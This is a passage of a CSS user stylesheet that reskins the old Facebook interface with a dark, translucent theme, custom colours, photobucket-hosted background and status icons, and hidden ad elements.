input,.SearchPage_EmailSearchLeft,.sub_info,.UIBigNumber_Label,.UIInsightsGeoList_ListTitle,.UIInsightsGeoList_ListItemValue,.UIInsightsSmall_Note,.textmedium,.UIFeedFormStory_Lead,.home_no_stories_content, .title_label,div[style*=\"color: rgb(102,102,102)\"],*[style*=\"color: rgb(51,51,51)\"],.tab_box_inner,.uiStreamMessage,.privacy_section_description,.info_text,.uiAttachmentDesc,.uiListBulleted span,.privacySettingsGrid th,.recommendations_metadata,.postleft dd:not(.usertitle),.postText,.mall_post_body_text,.fbChatMessage,.fbProfileBylineFragment,.nosave option,.uiAttachmentDetails,.fbInsightsTable td,.mall_post_body,.uiStreamPassive,.snippet,.questionInfo span,.promotionsHowto,.fcg,.headerColumn .fwb,.rowGroupTitle .fwb,.rowGroupDescription .fwb,.likeUnit,.aboveUnitContent,.placeholder,.sectionContent,.UIFaq_Snippet,.uiMenuItem:not(.checked) .name,.balloon-text,.fbLongBlurb,.legendLabel,.messageBody {color: #bbb !important;}\n\n.status_clear_link,h3,h1,.updates,.WelcomePage_SignUpHeadline,.WelcomePage_SignUpSubheadline,.mock_h4 .left,.review_header_title,caption,.logged_out_register_msg,.domain_name, .UITitledBox_Title,.signup_box_content,.highlight,.question,.whocan span,.UIFilterList > .UIFilterList_Title,.subject,.UIStoryAttachment_Label,.typeahead_message,.UIShareStage_Title,.alternate_name,.helper_text,.textlarge,.page .category,.item_date,.privacy_section_label,.privacy_section_title,.uiTextMetadata, .seeMoreTitle,.categoryContents,code,.usertitle,.fbAppSettingsPageHeader,.fsxl,.LogoutPage_MobileMessage,.LogoutPage_MobileSubmessage,.recommended_text,#all_friends_text,.removable,.ginormousProfileName,.experienceContent .fwb,#bfb_t_popular_body div[style*=\"color:#880000\"],.fsm:not(.snippet):not(.itemLabel):not(.fbChatMessage),.uiStreamHeaderTextRight,.bookmarksNavSeeAll,.tab .content,.fbProfilePlacesFilterCount,.fbMarketingTextColorDark,.pageNumTitle,.pluginRecommendationsBarButton {color: #96f !important;}\n\n.em,.story_comment_back_quote,.story_content,small,.story_content_excerpt,.walltext,.public,p span,#friends_page_subtitle,.main_title,.empty_message,.count,.count strong,.stories_not_included li span,.mobile_add_phone th,#friends strong,.current,.no_photos,.intro,.sub_selected a,.stats,.result_network,.note_body,#bodyContent div b,#bodyContent div,.upsell dt,.buddy_count_num strong,.left,.body,.tab .current,.aim_link span,.story_related_count,.admins span,.summary em,.fphone_number,.my_numbers_label,.blurb_inner,.photo_header strong,.note_content,.multi_friend_status,.current_path span,.current_path,.petition_header,.pyramid_summary strong,#status_text,.contact_email_pending em,.profile_needy_message,.paging_link div,.big_title,.fb_header_light,.import_status strong,.upload_guidelines ul li span,.upload_guidelines ul li span strong,#selector_status,.timestamp strong,.chat_notice,.notice_box,.text_container,.album_owner,.location,.info_rows dd,.divider,.post_user,div[style=\"color: rgb(101,107,111);\"] b,div[style=\"color: rgb(51,51,51);\"] b,.basic_info_summary_and_viewer_actions dd,.profile_info dd,.story_comment,p strong,th strong,.fstatus,.feed_story_body,.story_content_data,.home_prefs_saved p,.networks dd,.relationship_status dd,.birthday dd,.current_city dd,.UIIntentionalStory_Message,.UIFilterList_Selected a,.UIHomeBox_Title,.suggestion,.spell_suggest,.UIStoryAttachment_Caption,.fexth + td,.fext_short,#fb_menu_inbox_unread_count,.Tabset_selected .arrow .sel_link span,.UISelectList_check_Checked,.chat_fl_nux_header,.friendlist_status .title a,.chat_setting label,.UIPager_PageNum,.good_username,.UIComposer_AttachmentTitle,.rsvp_option:hover label,.Black,.comment_author span,.fan_status_inactive,.holder,.UIThumbPagerControl_PageNumber,.text_center,.nobody_selected,.email_promise,.blocklist ul,#advanced_body_1 label,.continue,.empty_albums,div[style*=\"color: black\"],.GBThreadMessageRow_Body_Content,.UIShareStage_Subtitle,#public_link_photo span,.GenericStory_Message,.UIStoryAttachment_Value,div[style*=\"color: black\"],.SearchPage_EmailSearchTitle,.uiTextSubtitle,.jewelHeader,.recent_activity_settings_label,.people_list_item,.uiTextTitle,.tab_box,.instant_personalization_title,.MobileMMSEmailSplash_Description,.MobileMMSEmailSplash_Tipsandtricks_Title,.fcb,input[value=\"Find Friends\"],#bodyContent,#bodyContent table,h6,.fbChatBuddylistError,.info dt,.bfb_options_minimized_hide,.connect_widget_connected_text,body.transparent_widget .connect_widget_not_connected_text,.connect_widget_button_count_count,.fbInsightsStatisticNumber,.fbInsightsTable thead th span,.header span,.friendlist_name a,.count .countValue,.uiHeaderTitle span,#about_text_less span,.uiStreamHeaderText,.navHeader,.uiAttachmentTitle,.fbProfilePlacesFilterText,.tagName,.ufb-dataTable-header-text,.ufb-text-content,.fb_content,.uiComposerAttachment .selected .attachmentName,.balloon-title,.cropMessage {color: #fff !important;}\n\n.bfb_post_action_container {opacity: .25 !important;}\n.bfb_post_action_container:hover {opacity: 1 !important;}\n\n.valid,.wallheader small,#photodate,.video_timestamp strong,.date_divider span,.feed_msg h5,.time,.item_contents,.boardkit_topic_updated,.walltime,.feed_time,.story_time,#status_time_inner,.written small,.date,div[style*=\"color: rgb(85,82,37)\"],.timestamp span,.time_stamp,.timestamp,.header_info_timestamp,.more_info div,.timeline,.UIIntentionalStory_Time,.fupdt,.note_timestamp,.chat_info_status_time,.comment_actions,.UIIntentionalStory_Time a,.UIUpcoming_Time,.rightlinks,.GBThreadMessageRow_Date,.GenericStory_Time a,.GenericStory_Time,.fbPrivacyPageHeader,.date_divider {color: #96f !important;}\n\n.textinput,select,.list_drop_zone,.msg_divide_bottom,textarea,input[type=\"text\"],input[type=\"file\"],input[type=\"search\"],input[type=\"input\"],input[type=\"password\"],.space,.tokenizer,input[type=\"hidden\"],#flm_new_input,.UITooltip:hover,.UIComposer_InputShadow,.searchroot input,input[name=\"search\"],.uiInlineTokenizer,input.text,input.nosave {background: rgba(0,0,0,.50) !important;-moz-appearance:none!important;color: #bbb !important;border: none !important;padding: 3px !important; }\n\ninput[type=\"text\"]:focus,textarea:focus,.fbChatSidebar .fbChatTypeahead .textInput:focus {box-shadow: 0 0 .5em #baf,inset 0 0 .25em #96f !important;}\n\n.uiOverlayPageWrapper,#fbPhotoSnowlift,.shareOverlay,.tlPageRecentOverlay  {background: -moz-radial-gradient(50% 50%,circle,rgba(10,10,10,.6),rgb(10,10,10) 90%) !important;}\n\n.bumper,.stageBackdrop {background: #000 !important;}\n#page_table {background: #333 }\n\n.checkableListItem:hover a,.selectedCheckable a  {background: #96f !important; }\n\n.GBSearchBox_Input,.tokenizer,.LTokenizerWrap,#mailBoxItems li a:hover,.uiTypeaheadView .search .selected,.itemAnchor:hover,.notePermalinkMaincol .top_bar, .notification:hover a,#bfb_tabs div:not(.bfb_tab_selected),.bfb_tab,.navIdentity form:hover,.connect_widget_not_connected_text,.uiTypeaheadView li.selected,.connect_widget_number_cloud,.placesMashCandidate:hover,.highlight,#bfb_option_list li a:hover {background: rgba(0,0,0,.5) !important;}\n\n.results .page,.calltoaction,.results li,.fbNubFlyout,.contextualBlind,.bfb_dialog,.bfb_image_preview,input.text,.fbChatSidebar,.jewelBox,.clickToTagMessage,.tagName,.ufb-tip-body,.flyoutContent,.fbTimelineMapFilterBar,.fbTimelineMapFilter,.fbPhotoStripTypeaheadForm,.groupsSlimBarTop,.pas,.contentBox,.fbMapCalloutMain, .pagesVoiceBar {background: rgba(10,10,10,.75) !important;}\n\n#pageNav .tinyman:hover a,#navHome:hover a,#pageNav .tinyman a[style*=\"cursor: progress\"],#navHome a[style*=\"cursor: progress\"],#home_filter_list,#home_sidebar,#contentWrapper,.LDialog,.dialog-body,.LDialog,.LJSDialog,.dialog-foot,.chat_input,#contentCol,#leftCol,.UIStandardFrame_Content,.red_box,.yellow_box,.uiWashLayoutOffsetContent,.uiOverlayContent,.bfb_post_action_container,.connect_widget_button_count_count,.shaded,.navIdentitySub,.jewelItemList li a:hover,.fbSidebarGripper div,.jewelCount,.uiBoxRed,.videoUnit,.lifeEventAddPhoto,.fbTimelineLogIntroMegaphone,.uiGamesLeaderboardItem,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.newInterestListNavItem:hover,.ogSliderAnimPagerPrevContent,.ogSingleStoryStatus,.ogSliderAnimPagerNextContent,.-cx-PRIVATE-uiDialog__body,.jewelItemNew .messagesContent   {background: rgba(10,10,10,.5) !important;}\n\n#home_stream,pre,.ufiItem,.odd,.uiBoxLightblue,.platform_dialog_bottom_bar,.uiBoxGray,.fbFeedbackPosts,.mall_divider_text,.uiWashLayoutGradientWash, #bfb_options_body,.UIMessageBoxStatus,.tip_content .highlight,.fbActivity, .auxlabel,.signup_bar_container,#wait_panel,.FBAttachmentStage,.sheet,.uiInfoTable .name,.HCContents,#devsiteHomeBody .content,.devsitePage .nav .content,#confirm_phone_frame,.fbTimelineCapsule .timelineUnitContainer,.timelineReportContainer,.aboveUnitContent,.aboutMePagelet,#pagelet_tab_content_friends,#fbProfilePlacesBorder,#pagelet_tab_content_notes,.externalShareUnit,.fbTimelineNavigationWrapper .detail,.tosPaneInfo,.navSubmenu:hover,#bfb_donate_pagelet > div,.better_fb_mini_message,.uiBoxWhite,.uiLoadingIndicatorAsync,.mleButton,.fbTimelineBoxCount,.navSubmenu:hover,.gradient,.profileBrowserGrid tr > td > div,.statsContainer,#admin_panel,.fbTimelineSection, .escapeHatch, .ogAggregationPanelContent, .-cx-PRIVATE-fbTimelineExternalShareUnit__root, .shareUnit a, .storyBox  {background: rgba(20,20,20,.4) !important;}\n\n.uiSelector .uiSelectorButton,.UIRoundedBox_Corner,.quote,.em,.UIRoundedBox_TL,.UIRoundedBox_TR,.UIRoundedBox_BR,.UIRoundedBox_LS,.UIRoundedBox_BL,.profile_color_bar,.pagefooter_topborder,.menu_content,h3,#feed_content_section_friend_lists,ul,li[class=\"\"],.comment_box,.comment,#homepage_bookmarks_show_more,.profile_top_wash,.canvas_container,.composer_rounded,.composer_well,.composer_tab_arrow,.composer_tab_rounded,.tl,.tr,.module_right_line_block,.body,.module_bottom_line,.lock_b_bottom_line,#info_section_info_2530096808 .info dt,.pipe,.dh_new_media,.dh_new_media .br,.frn_inpad,#frn_lists,#frni_0,.frecent span,h3 span,.UIMediaHeader_TitleWash,.editor_panel .right,.UIMediaButton_Container tbody *,#userprofile,.profile_box,.date_divider span,.corner,.profile #content .UIOneOff_Container,.ff3,.photo #nonfooter #page_height,.home #nonfooter #page_height,.home .UIFullPage_Container,.main-nav,.generic_dialog,#fb_multi_friend_selector_wrapper,#fb_multi_friend_selector,.tab span,.tabs,.pixelated,.disabled,.title_header .basic_header,#profile_tabs li,#tab_content,.inside td,.match_link span,tr[fbcontext=\"41097bfeb58d\"] table,.accent,#tags h2,.read_updates,.user_input,.home_corner,.home_side,.br,.share_and_hide,.recruit_action,.share_buttons,.input_wrapper,.status_field,.UIFilterList_ItemRight,.link_btn_style span,.UICheckList_Label,#flm_list_selector .Tabset_selected .arrow,#flm_list_selector .selector .arrow .sel_link,.friendlist_status .title a,.online_status_container,.list_drop_zone_inner,.good_username,.WelcomePage_Container,.UIComposer_ShareButton *,.UISelectList_Label,.UIComposer_InputShadow .UIComposer_TextArea,.UIMediaHeader_TitleWrapper,.boxtopcool_hg,.boxtopcool_trg,.boxtopcool_hd,.boxtopcool_trd,.boxtopcool_bd,.boxtopcool_bg,.boxtopcool_b,#confirm_button,.title_text,#advanced_friends_1,.fb_menu_item_link,.fb_menu_item_link small,.white_hover,.GBTabset_Pill span,.UINestedFilterList_ItemRight,.GBSearchBox_Input input,.inline_edit,.feedbackView .comment th div,.searchroot,.composerView th div,.reply th div,.LTokenizer,.Mentions_Input,form.comment div,.ufi_section,.BubbleCount,.BubbleCount_Right,.UIStory,.object_browser_pager_more,.friendlist_name,.friendlist_name a,.switch,#tagger,.tagger_border,.uiTooltip,#reorder_fl_alert,.UIBeeper_Full,#navSearch,#navAccount,#navAccountPic,#navAccountName,#navAccountInfo,#navAccountLink,#mailBoxItems,#pagelet_chat_home h4,.buddy_row,.home_no_stories,#xpageNav li .navSubmenu,.uiListItem:not(.ufiItem),.uiBubbleCount,.number,.fbChatBuddylistPanel,.wash,.settings_screenshot,.privacyPlan .uiListItem:hover,.no_border,.auxiliary .highlight,.emu_comments_box_nub,.numberContainer,.uiBlingBox,.uiBlingBox:hover span,.callout_buttons,.uiWashLayoutEmptyGradientWash,.inputContainer,.editNoteWrapperInput,.fbTextEditorToolbar,.logoutButton input,#contentArea .uiHeader + .uiBoxGray,.uiTokenizer,#bfb_tabs,.profilePictureNuxHighlight,.profile-picture,#ci_module_list,.textBoxContainer,#date_form .uiButton,.insightsDateRange,.MessagingReadHeader,.groupProfileHeaderWash,.questionSectionLabel,.metaInfoContainer,.uiStepList ol,.friend_list,.fbFeedbackMentions,.bb .fbNubFlyoutHeader,.bb .fbNubFlyoutFooter,.fbNubFlyoutInner .fbNubFlyoutFooter,.gradientTop,.gradientBottom,.helpPage,.fbEigenpollTypeahead .plus,.uiSearchInput,.opengraph,#developerAppDetailsContent,.timelineLayout #contentCol,.attachmentLifeEvents,.fbProfilePlacesFilterBar,.uiStreamHeader,.uiStreamHeaderChronologicalForm,.inner .text,.pageNotifPopup,.uiButtonGroup,.navSubmenuPageLink,.fbTimelineTimePeriod,.bornUnit,.mleFooter,#bfb_filter_add_row,#bfb_options .option .no_hover,.fbTimelinePhotosSeparator h4 span,.withsubsections,.showMore,.event_profile_information tr:hover,.nux_highlight_nub,.uiSideNav .uiCloseButton,.uiSideNav .uiCloseButton input,.fb_content,.uiComposerAttachment .selected .attachmentName,.fbHubsTokenizer,.coverEmptyWrap,.uiStreamHeaderText,.pagesTimelineButtonPagelet,.fbNubFlyoutBody,#pageNav .tinyman:hover,#navHome:hover,.fbRemindersThickline,.uiStreamEdgeStoryLine hr,.uiInfoTable tbody tr:hover,.fbTimelineUFI,#contentArea,.leftPageHead,.rightPageHead,.anchorUnit,#pageNav .topNavLink a:focus,.timeline_page_inbox_bar,.uiStreamEdgeStoryLineTx,.pluginRecommendationsBarButton,.pluginRecommendationsBarTop table, .uiToken, .ogAggregationPanelText, .UFIRow {background: transparent !important;}\n\n.UIObject_SelectedItem,.sidebar_item_header,.announcement_title,#pagefooter,.selected:not(.key-messages):not(.key-events):not(.key-media):not(.key-ff):not(.page):not(.group):not(.user):not(.app),.date_divider_label,.profile_action,.blurb ,.tabs_more_menu,.more a span,.selected h2,.column h2,.ffriends,.make_new_list_button_table tr,.title_header,.inbox_menu,.side_column,.section_header h3 span,.media_header,#album_container,.note_dialog,.dialog,.has_app,.UIMediaButton_Container,.dialog_title,.dialog_content,#mobile_notes_announcement,.see_all,#profileActions,.fbpage_group_title,.UIProfileBox_SubHeader,#profileFooter,.share_header,#share_button_dialog,.flag_nav_item_selected,.new_user_guide_content h2,#safety_page h4,.section_banner,.box_head,#header_bar,.content_sidebar h3,.content_header,#events h3,#blog h3,.footer_border_bottom,.firstHeading,#footer,.recent_news h3,.wrapper div h2,.UIProfileBox_Header,.box_header,.bdaycal_month_section,#feedTitle,.pop_content,#linkeditor,.UIMarketingBox_Box,.utility_menu a,.typeahead_list,.typeahead_suggestions,.typeahead_suggestion,.fb_dashboard_menu,.green_promotion,.module h2,.current_path,.boardkit_title,.current,.see_all2,.plain,.share_post,.add-link,li.selected,.active_list a,#photoactions a:not(#rotaterightlink):not(#rotateleftlink),.UIPhotoTagList_Header,.dropdown_menu,.menu_content,.menu_content li a:hover,.menu_content li:hover,#edit_profilepicture,.menu_content div a:hover,.contact_email_pending,.req_preview_guts,.inputbutton,.inputsubmit,.activation_actions_box,.wall_content,.matches_content_box_title,.new_menu_selected,#editnotes_content,#file_browser,.chat_window_wrapper,.chat_window,.chat_header,.hover,.dc_tabs a,.post_header,.header_cell,#error,.filters,.pages_dashboard_panel h2,.srch_landing h2,.bottom_tray,.next_action,.pl-divider-container,.sponsored_story,.header_current,.discover_concerts_box,.header,.sidebar_upsell_header,.activity_title h2,.wall_post_title,#maps_options_menu,.menu_link,.gamerProfileTitleBar,.feed_rooster ,.emails_success,.friendTable table:hover,.board_topic:hover,.fan_table table:hover,#partylist .partyrow:hover,.latest_video:hover,.wallpost:hover,.profileTable tr:hover,.friend_grid_col:hover,.bookmarks_list li:hover,.requests_list li:hover,.birthday_list li:hover,.tabs li,.fb_song:hover,.share_list .item_container:hover,.written a:hover,#photos_box .album:hover,.people .row .person:hover,.group_list .group:hover,.confirm_boxes .confirm:hover,.posted .share_item_wide .share_media:hover,.note:hover,.editapps_list .app_row:hover,.my_networks .blocks .block:hover,.mock_h4,#notification_options tr:hover,.notifications_settings li:hover,.mobile_account_main h2,.language h4,.products_listing .product:hover,.info .item .item_content:hover,.info_section:hover,.recent_notes p:hover,.side_note:hover,.suggestion,.story:hover,.post_data:hover,.album_row:hover,.track:hover,#pageheader,.message:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),.UITabGrid_Link:hover,.UIActionButton,.UIActionButton_Link,.confirm_button,.silver_dashboard,span.button,.col:hover,#photo_tag_selector,#pts_userlist,.flink_dropdown,.flink_inner,.grouprow:hover,#findagroup h4,#startagroup h4,.actionspro a:hover,.UIActionMenu_Menu,.UICheckList_Label:hover,.make_new_list_button_table,.contextual_dialog_content,#flm_list_selector .selector:hover,.show_advanced_controls:hover,.UISelectList_check_Checked,.section_header,.section_header_bg,#buddy_list_panel_settings_flyout,.options_actions,.chat_setting,.flyout,.flyout .UISelectList,.flyout .new_list,#tagging_instructions,.FriendsPage_MenuContainer,.UIActionMenu,.UIObjectListing:hover,.UIStory_Hide .UIActionMenu_Wrap,.UIBeeper,.branch_notice,.async_saving,.UIActionMenu .UIActionMenu_Wrap:hover,.attachment_link a:hover,.UITitledBox_Top,.UIBeep,.Beeps,#friends li a:hover,.apinote h2,.UIActionButton_Text,.rsvp_option:hover,.onglettrhi,.ongletghi,.ongletdhi,.ongletg,.onglettr,.ongletd,.confirm_block, .unfollow_message,.UINestedFilterList_SubItem_Selected .UINestedFilterList_SubItem_Link,.UINestedFilterList_SubItem_Link:hover,.UINestedFilterList_Item_Link:hover,.UINestedFilterList_Selected .UINestedFilterList_Item_Link,.app_dir_app_summary:hover,.app_dir_featured_app_summary:hover,.app_dir_app_wide_summary:hover,.UIStory:hover,.UIPortrait_TALL:hover,.UIActionMenu_Menu div,.UIButton_Blue,.UIButton_Gray,.quiz_cell:hover,.UIFilterList > .UIFilterList_Title,.message_rows tr:hover,.ntab:hover,.thumb_selected,.thumb:hover,.hovered a,.pandemic_bar,.promote_page,.promote_page a,.create_button a,.nux_highlight,.UIActionMenu_Wrap,.share_button_browser div,.silver_create_button,.painted_button,.flyer_button,table[bindpoint=\"thread_row\"] tbody tr:hover,.GBThreadMessageRow:hover,#header,.button:not(.close):not(.uiSelectorButton):not(.videoicon):not(.toggle),h4,button:not(.as_link),#navigation a:hover,.settingsPaneIcon:hover,a.current,.inboxView tr:hover,.tabView li a:hover,.friendListView li:hover,.LTypeaheadResults,.LTypeaheadResults a:hover,.dialog-title, .UISuggestionList_SubContainer:hover,.typeahead_message,.progress_bar_inner,.video:hover,.advanced_controls_link,.plays_val,.lightblue_box,.FriendAddingTool_InnerMenu .UISelectList,.gray_box,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,#navAccount li:not(#navAccountInfo),.jewelHeader,.seeMore,#mailBoxItems li,#pageFooter,.uiSideNav .key-nf:hover,.key-messages .item:hover,.key-messages ul li:hover,.key-events ul li:hover,.key-media ul li:hover,.key-ff ul li:hover,.key-apps:hover,.key-games:hover,.uiSideNav .sideNavItem:not(.open) .item:hover,.fbChatOrderedList .item:hover a,.uiHeader,.uiListItem:not(.mall_divider):hover,.uiSideNav li.selected > a,.ego_unit:hover,.results,.bordered_list_item:hover,.fbConnectWidgetFooter,#viewas_header,.fbNubFlyoutTitlebar,.info_text,.stage,.masterControl .selected a,.masterControl .controls .item a:hover,.uiTypeaheadView .search,.gigaboxx_thread_hidden_messages,.uiMenu,.uiMenuInner,.itemAnchor,.gigaboxx_thread_branch_message,.uiSideNavCount,.uiBoxYellow,.loggedout_menubar_container,.pbm .uiComposer,.megaphone_box,.uiCenteredMorePager,.fbEditProfileViewExperience:hover,.uiStepSelected .middle,.GM_options_header,.bfb_tab_selected, #MessagingShelfContent,.connect_widget_like_button,.uiSideNav .open,.fbActivity:hover,.fbQuestionsPollResultsBar,.insightsDateRangeCustom,.fbInsightsTable thead th,.mall_divider,.attachmentContent .fbTabGridItem:hover,.jewelItemNew,#MessagingThreadlist .unread,.type_selected,.bfb_sticky_note,.UIUpcoming_Item:hover,.progress_bar_outer,.fbChatBuddyListDropdown .uiButton,.UIConnectControlsListSelector .uiButton,.instructions,.uiComposerMetaContainer,.uiMetaComposerMessageBoxShelf,#feed_nux,#tickerNuxStoryDiv,.fbFeedTickerStory:hover,.fbCurrentStory:hover,.uiStream .uiStreamHeaderTall,.fbChatSidebarMessage,.fbPhotoSnowboxInfo,.devsitePage .menu,.devsitePage .menu .content,#devsiteHomeBody .wikiPanel > div,.toolbarContentContainer,.fbTimelineUnitActor,#fbTimelineHeadline,.fbTimelineNavigation,.fbTimelineFeedbackActions,.timelineReportHeader,.fbTimelineCapsule .timelineUnitContainer:hover,.timelineReportContainer:hover,.fbTimelineComposerAttachments .uiListItem:hover span a,.timelinePublishedToolbar,.timelineRecentActivityLabel,.fbTimelineMoreButton,.overlayTitle,.friendsBoxHeader,.escapeHatchHeader,.tickerStoryAllowClick,.appInvite:hover,.fbRemindersStory:hover,.lifeEventAddPhoto a:hover,.insights-header,.ufb-dataTable-header-container,.ufb-button,.older-posts-content,.mleButton:hover,.btnLink,.fill,.cropMessage,.adminPanelList li:hover a,.tlPageRecentOverlayStream,.addListPageMegaphone,.searchListsBox,.ogStaticPagerHeader,.dialogTitle,#rogerSidenavCallout,.fbTimelineAggregatedMapUnitSeeAll,.shareRedesignContainer,.ogSingleStoryText,.ogSliderAnimPagerPrevWrapper,.ogSliderAnimPagerNextWrapper,.shareRedesignText,.pluginRecommendationsBarTop,.timelineRecentActivityStory:hover, .ogAggregationPanelUFI\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat !important;}\n\n.hovercard .stage,.profileChip,.GM_options_wrapper_inner,.MessagingReadHeader .uiHeader,#MessagingShelf,#navAccount ul,.uiTypeaheadView,.uiFacepileItem .uiTooltipWrap,.fbJewelFlyout,.jewelItemList li,.notification:not(.jewelItemNew),.fbNubButton,.fbChatTourCallout .body,.uiContextualDialogContent,.fbTimelineStickyHeader .back,.timelineExpandLabel:hover,.pageNotifFooter a,.fbSettingsListLink:hover,.uiOverlayPageContent,#bfb_option_list,.fbPhotoSnowlift .rhc,.ufb-tip-title,.balloon-content,.tlPageRecentOverlayTitle,.uiDialog,.uiDialogForm,.permissionsLockText, .uiMenuXBorder,.-cx-PRIVATE-uiDialog__content,.-cx-PRIVATE-uiDialog__title, ._k5\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat, rgba(10,10,10,.6) !important; }\n\n.unread .badge,.fbDockChatBuddyListNub .icon,.sx_7173a9,.selectedCheckable .checkmark {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball15.png\") no-repeat right center!important;}\n\ntable[class=\" \"] .badge:hover,table[class=\"\"] .badge:hover,.offline .fbDockChatBuddyListNub .icon,.fbChatSidebar.offline .fbChatSidebarMessage .img  {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball15.png\") no-repeat right center!important;}\n\n.fbChatSidebar.offline .fbChatSidebarMessage .img {height: 16px !important;}\n\n.offline .fbDockChatBuddyListNub .icon,.fbDockChatBuddyListNub .icon,.sx_7173a9 {margin-top: 0 !important;height: 15px !important;}\n\na.idle,.buddyRow.idle .buddyBlock,.fbChatTab.idle .tab_availability,.fbChatTab.disabled .tab_availability,.chatIdle .chatStatus,.idle .fbChatUserTab .wrap,.chatIdle .uiTooltipText,.markunread,.bb .fbDockChatTab.user.idle .titlebarTextWrapper,.fbChatOrderedList .item:not(.active) .status {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball10paddedright.png\") no-repeat left center !important;}\n\n.fbChatOrderedList .item .status {width: 10px !important;}\n\n.headerTinymanName {max-width: 320px !important; white-space: nowrap !important; overflow: hidden !important;}\n\n.uiTooltipText {padding-left: 14px !important;border: none !important;}\n \n.fbNubButton,.bb .fbNubFlyoutTitlebar,.bb .fbNub .noTitlebar,.fbDockChatTab,#fbDockChatBuddylistNub .fbNubFlyout,.fbDockChatTabFlyout,.titlebar {border-radius: 8px 8px 0 0!important;}\n\n.uiSideNav .open {padding-right: 0 !important;}\n.uiSideNav .open,.uiSideNav .open > *,#home_stream > *,.bb .rNubContainer .fbNub,.fbChatTab {margin-left: 0 !important;}\n.uiSideNav .open ul > * {margin-left: -20px !important;}\n.uiSideNav .open .subitem > .rfloat {margin-right: 20px !important;}\n\n.timelineUnitContainer .timelineAudienceSelector .uiSelectorButton {padding: 1px !important; margin: 4px 0 0 4px !important;}\n.timelineUnitContainer .audienceSelector .uiButtonNoText .customimg {margin: 2px !important;}\n.timelineUnitContainer .composerAudienceSelector .customimg {opacity: 1 !important; background-position: 0 1px !important; padding: 0 !important;}\n\n.fbNub.user:not(.disabled) .wrap {padding-left: 15px !important;}\n.fbNubFlyoutTitlebar .titlebarText {padding-left: 12px !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.uiMenu .checked .itemAnchor {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball10paddedright.png\") no-repeat !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,a.idle,.buddyRow.idle .buddyBlock {background-position: right center !important;}\n\n.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.user .fbChatUserTab .wrap {background-position: left center !important;}\n\n.uiMenu .checked .itemAnchor {background-position: 5px center !important;}\n\n.markunread,.markread {background-position: 0 center !important;}\n\n.chatIdle .chatStatus,.chatOnline .chatStatus {width: 10px !important;height: 10px !important;background-position: 0 0 !important;}\n\n#fbRequestsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends-Gray.png\") no-repeat center center !important;}\n\n#fbRequestsJewel:hover .jewelButton,#fbRequestsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends.png\") no-repeat center center !important;}\n\n#fbMessagesJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon-gray.png\") no-repeat center center !important;}\n\n#fbMessagesJewel:hover .jewelButton,#fbMessagesJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth-gray.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel:hover .jewelButton,#fbNotificationsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth.png\") no-repeat center center !important;}\n\n.topBorder,.bottomBorder {background: #000 !important;}\n\n.pl-item,.ical,.pop_content  {background-color: #333 !important;}\n.pl-alt {background-color: #222 !important;}\n\n.friend:hover,.friend:not(.idle):hover,.fbTimelineRibbon {background-color: rgba(10,10,10,.6) !important;}\n\n.maps_arrow,#sidebar_ads,.available .x_to_hide,.left_line,.line_mask,.chat_input_border,.connect_widget_button_count_nub,\n.uiStreamPrivacyContainer .uiTooltip .img,.UIObjectListing_PicRounded,.UIRoundedImage_CornersSprite,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TR,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BR,.UILinkButton_R,.pagesAboutDivider  {visibility:hidden !important;}\n\n.nub,#contentCurve,#pagelet_netego_ads,img.plus,.highlighter,.uiToolbarDivider,.bfb_sticky_note_arrow_border,.bfb_sticky_note_arrow,#ConfirmBannerOuterContainer,.uiStreamHeaderBorder,.topBorder,.bottomBorder,.middleLink:after,.sideNavItem .uiCloseButton,.mask,.topSectionBottomBorder {display: none !important;}\n\n.fbChatBuddyListTypeahead {display: block !important;}\n\n.chat_input {width: 195px !important;}\n\n.fb_song_play_btn,.friend,.wrap,.uiTypeahead,.share,.raised,.donated,.recruited,.srch_landing,.story_editor,.jewelCount span, .menuPulldown {background-color: transparent 